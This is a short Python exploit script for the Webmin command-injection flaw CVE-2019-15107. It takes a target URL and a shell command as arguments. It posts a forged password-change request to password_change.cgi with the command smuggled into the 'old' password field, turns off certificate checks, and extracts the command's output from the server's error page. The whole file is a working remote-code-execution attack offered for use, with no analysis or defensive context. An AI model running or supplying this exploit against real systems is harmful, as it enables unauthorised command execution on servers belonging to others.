import requests
import re
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# 禁用安全请求警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def exploit(url, shell):
    urls = url + "/password_change.cgi"
    headers = {
    'Accept-Encoding': "gzip, deflate",
    'Accept': "*/*",
    'Accept-Language': "en",
    'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    'Connection': "close",
    'Cookie': "redirect=1; testing=1; sid=x; sessiontest=1",
    'Referer': "{}/session_login.cgi".format(urls),
    'Content-Type': "application/x-www-form-urlencoded",
    'Content-Length': "60",
    'cache-control': "no-cache"
    }
    # don't need |
    payload="user=rootxx&pam=&expired=2&old={}&new1=test2&new2=test2".format(shell)
    r = requests.post(url=urls, headers=headers, data=payload, verify=False)
    #print(r.text)
    if r.status_code ==200 and "The current password is " in r.text :
        rs = re.compile(r"<center><h3>Failed to change password : The current password is incorrect(.*)</h3></center>",flags=re.DOTALL)
        result = rs.findall(r.text)
        #print(result)
        print ("Execute result:" + result[0])
    else:
        print ("No CVE-2019-15107!")


if __name__ == "__main__":
    url = sys.argv[1]
    shell = sys.argv[2]
    # url = "https://172.16.20.134:10000"
    # shell = "whoami"
    exploit(url, shell)